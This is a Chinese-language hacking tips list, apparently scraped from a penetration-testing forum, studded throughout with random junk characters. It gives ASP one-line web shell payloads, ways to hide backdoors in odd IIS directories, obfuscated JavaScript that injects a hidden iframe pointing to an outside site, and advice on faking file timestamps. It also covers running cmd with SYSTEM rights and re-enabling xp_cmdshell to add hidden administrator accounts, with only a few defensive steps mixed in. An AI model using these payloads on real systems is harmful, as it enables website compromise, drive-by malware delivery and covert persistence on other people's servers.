' ]& F- g' T9 W( h* bd).<script language=VBScript runat=server>execute request("sb")</Script>1 \" }4 B$ U! D5 R1 }
e).<%25Execute(request("l"))%25>
; R& N2 e, H" w$ W( f9 w: ^f).<%if request("cmd")<>"" then execute request("pass")%>
# ^. ]( I( v) K* _& q9 `% |' ]# `  Q; c: H/ ]
52、at "12:17" /interactive cmd! Q* D( @. W1 K8 p5 d) C, W# H
执行后可以用AT命令查看新加的任务
& b) ?% [" V1 F% [9 s用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 Y. u4 K3 h, v" r0 w' u& a
2 \7 p) y- B# o7 }  C& e/ ]9 u53、隐藏ASP后门的两种方法
* n( |/ }' }# ?4 |! v1、建立非标准目录:mkdir images..\! l1 }1 V' U0 X) m
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
2 R/ R8 X8 J0 l2 I9 M通过web访问ASP木马:http://ip/images../news.asp?action=login
7 h; ^+ M/ i1 a" r如何删除非标准目录:rmdir images..\ /s
' J7 h3 o7 `2 w4 V+ z2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:2 C! _; S1 K. ~- z6 ^
mkdir programme.asp
- i- Y$ e$ }8 ]2 M2 `' u新建1.txt文件内容:<!--#include file=”12.jpg”-->& D2 ~  q; @8 d% y% |0 K
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 ~1 B, M/ @. u! j$ k! I+ ?attrib +H +S programme.asp
6 c1 j4 y; u7 z) P/ h; M通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
1 S0 R: e4 f- ]$ q: ^
) C1 }$ |4 A4 b9 t' d54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ M  s' i/ W/ e; U) n  w; D
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
, M+ q) L  x5 k! }* R7 ~* H) S1 K3 B8 x$ S* m: |
55、JS隐蔽挂马# q- z. S+ ?# B/ X" Z
1.3 Z9 g) h1 I- }% g+ L
var tr4c3="<iframe src=ht";3 @/ Q$ `. W7 ~
tr4c3 = tr4c3+"tp:/";
4 M% F. n8 F+ F7 }8 d. N* gtr4c3 = tr4c3+"/ww";
' H0 G; X( y. vtr4c3 = tr4c3+"w.tr4";% V; L* G* @9 c4 F" _, F5 ~
tr4c3 = tr4c3+"c3.com/inc/m";" f; P/ b5 v$ J- {- T
tr4c3 = tr4c3+"m.htm style="display:none"></i";
8 L1 t/ e* S# L. Btr4c3 =tr4c3+"frame>'";
# `  w9 P1 A- X3 v% g9 Zdocument.write(tr4c3);2 v3 s4 H% f) ]8 ]/ r" s
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 c/ q; W; j& g) C0 M' b9 K4 G+ X! I
* D: j( Q# k/ }2.' A- |, c; j5 V. }
转换进制,然后用EVAL执行。如" z! Q8 ]. ]/ A; b+ q2 K, C0 V
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
6 R& G- l& Z' n7 m不过这个有点显眼。
3 k/ j9 N1 Q8 J* b+ S# I- Z1 W% a3.
9 N2 [/ E: |$ j' b) \document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
6 Y  _% V; D  I$ H$ e最后一点,别忘了把文件的时间也修改下。6 u; C7 t0 B; h3 r9 _% T, f

1 P  Z8 [  M$ D" L8 S56.3389终端入侵常用DOS命令
: A$ z) ^) c. v' Otaskkill taskkill /PID 1248 /t5 H) `1 A. @- C  W+ E- N
& O; ]) e: V: y  d% ?/ P2 T* i
tasklist 查进程
6 {: s: a* Y5 d
; y4 e* u8 y4 J3 h" n$ N9 q. Kcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
4 c5 n6 j. [6 }- I8 |3 L7 Eiisreset /reboot8 t: z' e% U! a- \4 e9 p
tsshutdn /reboot /delay:1    重起服务器
! a2 l. f6 ?3 I4 g: N* L/ j5 D* z0 t% l; |0 F; Y+ e
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
/ [9 w/ m0 z6 \' a! T2 s( X% d
# R" J# @/ [: W7 x/ k- E9 [) Nquery user 查看当前终端用户在线情况
% f: d# a1 ~. [" i, x3 L2 B
' S( w& P  B1 Z4 c* [8 i要显示有关所有会话使用的进程的信息,请键入:query process *. v# K  E& Y' K; O

1 E4 W3 c( \* e8 V: G7 i  X1 h要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ m2 r/ I* h* }+ m
/ a  Q; Y: t! r/ e要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER25 i' n2 r+ e9 q, t, t9 f. R

  i. `; {+ @! H: f要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" z9 k+ ]' Z- ?/ F8 M3 D

1 w. {/ s* A! ]! C% S命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
& R7 c+ B3 z2 o1 r$ g& f, B! c9 t
; r/ L- {6 ^9 O: s- ?" q* s7 B命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统" N& `, _9 k- V- g, o3 k% M

) `- _* B0 h, z( E: i命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。1 {8 p) t- i+ x" ]. g' d2 G
* M( I3 @& T$ x1 E3 v4 w8 s
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机; p$ B! z6 F% R4 b

- ^5 _" c' t& U: |' ^8 n56、在地址栏或按Ctrl+O,输入:3 r& n- O& c$ ^9 |; {, Y' ~7 u- i3 p; i
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 }  r9 J' C; ^2 l/ b4 G9 K

! g1 u: U  |! w6 ]/ X) ?源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
  L# `  z- h' W# _7 ?5 I0 v6 G
' W( l' q7 L' N; Y, E. N1 a$ D57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
" d# u+ g) P+ d3 z5 h9 n用net localgroup administrators是可以看到管理组下,加了$的用户的。
; J8 H5 Y, f8 K- L) ~% f1 C0 f* M4 x, e- [9 d6 H
58、 sa弱口令相关命令
9 U( i- @6 m. \0 j/ Z1 `: ]6 A8 A1 {2 _0 k
一.更改sa口令方法:. a9 O0 n7 u8 b' L/ p
用sql综合利用工具连接后,执行命令:
: A% H: J! N* H; U% sexec sp_password NULL,'20001001','sa'
4 [) P2 S9 w0 v5 V6 t5 I. l" Z8 I/ O: f(提示:慎用!)
0 u% `2 w# r  k) V# x) I; Y4 j( b* q3 y0 p
二.简单修补sa弱口令.
% e( x4 i% F! x6 q8 x  W/ S' ^
8 v  B: p6 f" z/ X, c" R# p7 C2 V3 n方法1:查询分离器连接后执行:! @* D/ U2 t2 T6 y6 ]: a+ s
if exists (select * from
. F- i. z0 ?. `6 mdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and. ~7 l$ Z3 H) G! S' q: L
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' t1 K: n5 p1 w0 v
# T0 ^5 T- w, y7 i3 Aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
) m6 c, g7 {* f5 F- \- F+ j) N# i& ]. i" j% q5 d% B
GO- R* W# E. T- t9 a: H
3 ~- K5 q& l1 x! L  ~0 w- ]" H
然后按F5键命令执行完毕2 r- ~# A0 J4 }! S0 [) g
# [# E& P" G  A: \& `6 S; p
方法2:查询分离器连接后
1 z, N  Z( _2 r" r第一步执行:use master
  Q- e5 w  Z9 s) n第二步执行:sp_dropextendedproc 'xp_cmdshell'# f9 c7 ?( V& g6 y: W4 O! p. t
然后按F5键命令执行完毕
$ k2 f  |! H0 K/ P2 H, f+ S
& ]8 {9 }- b$ w: j( N
$ r) E( r, m9 h, T: }三.常见情况恢复执行xp_cmdshell., c0 K7 j2 P9 |& L: q
+ Y: R4 ?, `0 m; `! U( d# m

* _' i* a: k  a2 o2 M1 未能找到存储过程'master..xpcmdshell'.
! I9 F& k& Y8 I   恢复方法:查询分离器连接后,; A$ u( c: D2 I. p0 J
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ y' o8 y7 M7 {第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 A0 g6 p; ^5 q# N4 C  L1 Y; _
然后按F5键命令执行完毕
" f! G5 {* s% c2 T! L8 A. M7 z( N' H  J6 Y2 V/ e8 H
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)1 o) |. f4 Z. |/ y
恢复方法:查询分离器连接后,( w) j* w2 o' w0 [" W8 R( Z
第一步执行:sp_dropextendedproc "xp_cmdshell"
3 H6 r( R$ z$ R5 H4 G: Q, I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ D! D  }- d+ Y: ^9 P4 S( {; y5 o然后按F5键命令执行完毕. S* @) p% M0 k% Z- p. v5 ^

. g2 e6 c/ g2 Y! x3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 }6 v4 r! U" a- ~/ K3 X恢复方法:查询分离器连接后,
# M( t1 U- @( J( a4 T第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
" B8 d6 b- p" ^$ D2 w' D第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           8 u! o3 z$ u& G5 Y% [
然后按F5键命令执行完毕* I  u5 ]% a. t" i" p
9 o3 V' J, {- f$ K6 f5 E
四.终极方法.
; d& b( m5 q; G" f. _7 X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:( E# O% [! n! e" p8 K% Y. M+ f
查询分离器连接后," e  \6 u  d# Q7 e" N8 G5 ]
2000servser系统:
# W$ e4 V4 D# o/ ]2 h0 S( e9 r" g# W' Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 J# X1 G, z" w- }3 h+ @) U  t# Q( Y" F. _' u/ L" m1 O8 L) ?; s& C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'! Y* d7 r; S! O3 a
6 y2 c" @# T: o. F( u
xp或2003server系统:
7 ^3 ^# i" L5 ?) j/ r* m* H& l; g0 `7 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ E2 R3 l1 x" g$ F! d+ U6 J; P) ?' ]& h5 ]9 \2 v( ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 W3 ?: J4 b; n* e* K: t7 m




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2